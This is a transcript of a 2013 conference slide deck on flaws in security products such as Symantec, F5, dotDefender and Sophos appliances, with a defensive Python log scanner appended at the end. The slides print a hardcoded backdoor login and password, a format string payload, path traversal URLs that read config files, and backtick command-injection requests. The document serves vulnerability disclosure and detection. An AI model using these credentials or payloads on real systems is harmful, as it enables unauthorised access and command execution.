Insecurity software

PHDays'13

Alexander Antukh

May 24, 2013

Transcript

  1. Insecurity Software

    PHDays 2013
    Version: 1.0
    Author: Alexander Antukh
    Responsible: Alexander Antukh
    Date: 24.05.2013
    Confidentiality: Public
  2. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Agenda
    •  Introduction
    •  What is Security Software
    •  Historical review
    •  The Question
    •  The Answer
    •  Vuln, where art thou?
    •  Afterword
    •  QA
  3. SEC Consult – Who we are

    •  Leading international application security consultancy
    •  Founded 2002
    •  Headquarters near Vienna, Austria
    •  Delivery Centers in Austria, Germany, Lithuania and Singapore
    •  Strong customer base in Central and Eastern Europe
    •  Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors)
    •  35+ application security experts
    •  Industry focus banks, software vendors, government

    [Map legend: SEC Consult Headquarter, SEC Consult Office, Other SEC Consult Clients; labels: Canada, USA, India, Singapore, Lithuania, Germany, Austria, Central and Eastern Europe]
  4. Alexander Antukh – Whoami

    •  Security consultant
    •  Offensive Security Certified Expert
    •  Defcon Moscow Local Group Coordinator
    *kidhacker
  5. Agenda

    •  Introduction
    •  What is Security Software
    •  Historical review
    •  The Question
    •  The Answer
    •  Vuln, where art thou?
    •  Afterword
    •  QA
  6. What is Security Software

    “A generic term referring to any computer program or library which purpose is to (help to) secure a computer system or a computer network”
  7. What is Security Software

    The keyword in all the security software is…
  8. What is Security Software
  9. What is Security Software

    In other words, SS is a piece of “anti-evil” software which makes you feel safe and “anti-bad”
  10. Agenda

    •  Introduction
    •  What is Security Software
    •  Historical review
    •  The Question
    •  The Answer
    •  Vuln, where art thou?
    •  Afterword
    •  QA
  11. Historical review – Firewall

    •  Evolution: Packet filter → Stateful FW → App layer FW
    •  First appearance: 1988
    •  First *registered* exploit: 1995
    •  Objective: control network traffic and determine if it’s good enough to pass
  12. Historical review – ID(P)S

    Ceci n’est pas un firewall...
    •  First appearance: 1986
    •  First *registered* hack: 1999
    •  Objective: monitor for malicious activities or policy violations (heuristics, signatures...)
    ✓ Statistical anomaly-based
    ✓ Signature-based
    ✓ Passive (detection)
    ✓ Reactive (prevention)
  13. Historical review – AntiSpam

    •  First appearance: Monty Python
    •  First PoC: 1978
    •  Industrial scale: 1994 - ...
    •  CAN-SPAM Act of 2003: spam is legal
    •  AntiSpam evolution: Del → Keywords → Blacklists → Auth → Protocol analysis → Filtering
  14. Historical review – Anti-sniffing

    •  First registered hack: 1903 (OSVDB-ID: 79399, 79400)
    •  Nevil Maskelyne
    •  “… I did it for the lulz”
    •  Today it’s net configuration, encryption and IDS/IPS
  15. Historical review – Anti-virus

    •  First „viruses“: 1971
    •  First viruses: mid-1980s
    •  First AVs: mid-1980s (CHK4BOMB, BOMBSQUAD, DRPROTECT)
    •  Virus evolution: Benign → Destructive → $$$$$
  16. Historical review

    AV companies don’t stand still…
  17. Historical review

    … neither do other SS products
  18. Agenda

    •  Introduction
    •  What is Security Software
    •  Historical review
    •  The Question
    •  The Answer
    •  Vuln, where art thou?
    •  Afterword
    •  QA
  19. The question

    Do you know anybody less boring?
    What if the SS is vulnerable itself?
  20. The answer

    *sorry for my English
  21. Déjà vu (slide from PHDays 2012)

    •  Reverse engineering
        •  Checkpoint – Client side remote command execution
           Multiple Checkpoint appliances, CVE-2011-1827
    •  Fuzzing
        •  F5 Firepass – Remote command execution
           F5 FirePass SSL VPN – Remote command execution, CVE-2012-1777
    •  Application testing
        •  Microsoft ASP.Net – Authentication bypass
           Microsoft Security Bulletin MS11-100 - Critical Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2638420), CVE-2011-3416

    Security software products will be the target of the trade ... soon!
  22. The time has come!
  23. The answer

    •  Symantec Messaging Gateway
        •  Backdoor by design → Code execution
    •  F5 BIG-IP
        •  SQL Injection, XXE → Passwords… → Root access
    •  Applicure dotDefender WAF
        •  Format string vulnerability → Code execution
    •  Sophos Web Protection Appliance
        •  LFI, OS Command Injection → Command execution, admin account pwn

    Security software products are the target of the trade ... already!
  24. The answer – Symantec Messaging Gateway v.9.5.x

    “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“

    SSH?! Remote shell!
    •  Login: support
    •  MD5: 52e3bbafc627009ac13caff1200a0dbf
    •  Password: symantec
  25. The answer – F5 BIG-IP <= 11.2.0

    “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“
  26. The answer – F5 BIG-IP <= 11.2.0

    sam/admin/reports/php/getSettings.php →
  27. The answer – AppliCure dotDefender WAF <= 4.26

    “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“

    Web Attack?
  28. The answer – AppliCure dotDefender WAF <= 4.26

    Error page can be configured in different ways:
    Vars to be added to the body of a custom page:
    •  %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
    •  %RID% - reference ID
    •  %IP% - server's IP address
    •  %DATE_TIME% - date of blocked request

    Looks nice…
  29. The answer – AppliCure dotDefender WAF <= 4.26

    Format string injection
    •  Variables
    •  Buffer
    •  ...
    •  AP_PRINTF()
    check for format string vulnerabilities
    … should be <%IP%>
    Host: …
    Algorithm:
    %666d\xBA\xAD\xBE\xEF…
  30. The answer – Sophos Web Protection Appliance <= 3.7.8.1

    “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“

    https://<host>/cgi-bin/patience.cgi?id=..
    ?id=../../persist/config/shared.conf%00
    ?id=../../log/ui_access_log%00

    "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

    Passwords!
  31. The answer – Sophos Web Protection Appliance <= 3.7.8.1

    Diagnostic Tools

    POST /index.php?c=diagnostic_tools HTTP/1.1
    ...
    action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60
  32. The answer – Sophos Web Protection Appliance <= 3.7.8.1

    Block page (%%user_workstation%%“)

    https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60
  33. The answer – Sophos Web Protection Appliance <= 3.7.8.1

    Local Site List

    POST /index.php?c=local_site_list_editor HTTP/1.1
    ...
    STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
  34. The answer – Sophos Web Protection Appliance <= 3.7.8.1
  35. Agenda

    •  Introduction
    •  What is Security Software
    •  Historical review
    •  The Question
    •  The Answer
    •  Vuln, where art thou?
    •  Afterword
    •  QA
  36. Vuln, where art thou?

    •  Methods for identifying usable bugs in “Software products”
        •  Application testing and Fuzzing
        •  Reverse engineering
        •  Source code analysis
    •  A short note on so-called “security scanning” tools
  37. Vuln, where art thou?

    •  The workflow for the appliance analysis is pretty simple!
        •  get a virtual appliance demo version
        •  install the appliance
        •  add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files)
        •  add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
        •  start the appliance again and log in :)
        •  look at the services that are running (and their configuration)
        •  pwnage ;)
  38. Vuln, where art thou?

    *Move two matches to make it three equal squares
  39. Vuln, where art thou?

    Start me up!
  40. Agenda

    •  Introduction
    •  What is Security Software
    •  Historical review
    •  The Question
    •  The Answer
    •  Vuln, where art thou?
    •  Afterword
    •  QA
  41. Sometimes it’s easier to find the vulnerability than might be expected . . .

    *doesn’t exist yet

    And now for something completely different
  42. QA
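
A defender's view of the Sophos Web Protection Appliance requests on slides 30–33, as an added example that is not part of the original deck: a Python check that decodes request parameters and flags the `../` plus `%00` file-read pattern and backtick command substitution. The log lines, client addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines modelled on the request shapes from
# slides 30 and 32; addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [24/May/2013:10:00:01 +0000] "GET /cgi-bin/patience.cgi?id=../../log/ui_access_log%00 HTTP/1.1" 200 5120
198.51.100.7 - - [24/May/2013:10:00:09 +0000] "GET /end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 HTTP/1.1" 200 812
203.0.113.20 - - [24/May/2013:10:01:30 +0000] "GET /end-user/index.php?reason=application&client-ip=10.0.0.5 HTTP/1.1" 200 812
203.0.113.20 - - [24/May/2013:10:02:00 +0000] "GET /cgi-bin/patience.cgi?id=3f9a HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rules run on percent-decoded values, so %60 and %00 cannot hide the pattern.
RULES = {
    "path-traversal": re.compile(r"\.\.[/\\]"),
    "null-byte": re.compile(r"\x00"),
    "shell-substitution": re.compile(r"`|\$\("),
}

def findings_for(encoded_params):
    """Return sorted (parameter, rule) pairs for a query string or form body."""
    hits = set()
    for name, value in parse_qsl(encoded_params, keep_blank_values=True):
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.add((name, rule))
    return sorted(hits)

def scan_log(text):
    """Return (client, path, findings) for every log line with a hit."""
    results = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        hits = findings_for(parts.query)
        if hits:
            results.append((client, parts.path, hits))
    return results

if __name__ == "__main__":
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(client, path, hits)
```

The requests on slides 31 and 33 carry their parameters in a POST body, which a standard access log does not record; `findings_for` accepts a form-encoded body as well, so the same rules can run wherever bodies are captured.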